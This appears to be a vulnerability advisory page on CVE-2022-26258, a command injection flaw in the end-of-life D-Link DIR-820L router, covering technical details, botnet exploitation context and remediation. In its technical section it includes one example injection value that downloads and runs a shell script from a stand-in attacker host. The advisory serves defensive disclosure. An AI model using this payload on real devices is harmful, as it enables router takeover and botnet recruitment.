What is D-Link DIR-820L?
The D-Link DIR-820L is a consumer and SOHO (small office/home office) wireless router manufactured by D-Link. Like many consumer routers of its generation, the DIR-820L reached end-of-life status, meaning D-Link no longer provides firmware updates or security patches. Consumer routers in this class are prime targets for botnet operators and persistent access campaigns due to their internet-facing position and typically unmanaged state.
Overview
CVE-2022-26258 is a critical OS command injection vulnerability (CWE-78) in the D-Link DIR-820L router's web management interface. The Device Name parameter in the /lan.asp page is passed to an underlying shell command without proper sanitization, allowing an attacker to inject arbitrary OS commands. The device is end-of-life and D-Link will not release a patch. CVSS 9.8. CISA's required action is to disconnect the device.
Affected Versions
| Product | Status |
|---|---|
| D-Link DIR-820L | All firmware versions — end-of-life, no patch available |
Technical Details
The vulnerability is an OS command injection (CWE-78) in the router's web-based management interface. The /lan.asp page includes a form field for configuring the router's device name on the local network. The CGI handler that processes this form takes the user-supplied device name value and passes it to a shell command (e.g., for hostname configuration) without sanitizing for shell metacharacters.
An attacker can inject shell commands by including metacharacters such as ;, |, or backtick command substitution:
Device Name: MyRouter;wget http://attacker.com/bot.sh -O /tmp/bot.sh;sh /tmp/bot.sh
The router's web interface is typically accessible on the LAN (192.168.x.x) and may require authentication for the management UI, but many devices have default credentials (admin/admin) or no password set. Additionally, some variants of this attack class work through the router's WAN-side interface if remote management is enabled.
Discovery
The vulnerability was reported by security researchers and published in March 2022. D-Link acknowledged the issue but declined to issue a patch given the EoL status of the device.
Exploitation Context
D-Link EoL routers are a favored target for IoT botnets. Mirai-variant botnets and other botnet families specifically target this class of SOHO router for several reasons:
- Large installed base that remains deployed long after EoL
- Default or weak credentials are common
- Devices run 24/7 with stable internet connections
- No automatic patching mechanism exists
Compromised SOHO routers are used for:
- DDoS botnet recruitment
- Residential/SOHO proxy networks for anonymizing other attacks
- Network pivoting if connected to a business environment
- Persistent backdoor access for long-term surveillance
Remediation
- Disconnect the device: CISA's required action — if still using a DIR-820L, replace it with a supported router model.
- Replace with supported hardware: Choose a router from a vendor with an active security update program and reasonable support lifecycle.
- If immediate replacement is impossible: Disable remote management (WAN-side web interface), change default credentials to a strong unique password, and ensure the router is behind an upstream firewall.
- Network segmentation: Do not rely on an EoL router as the sole network security control — add a separate firewall or managed switch to isolate critical systems.
- Check for compromise: Review the router's DNS settings (DNS hijacking is common post-compromise), connected device list for unknown entries, and outbound connection logs if available.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2022-26258 |
| Vendor / Product | D-Link — DIR-820L |
| NVD Published | 2022-03-28 |
| NVD Last Modified | 2025-11-03 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 find similar ↗ |
| CISA KEV Added | 2022-09-08 |
| CISA KEV Deadline | 2022-09-29 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2022-03-28 | CVE published; D-Link confirmed EoL status — no patch |
| 2022-09-08 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-09-29 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2022-26258 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| D-Link Support Announcement SAP10295 | Vendor Advisory |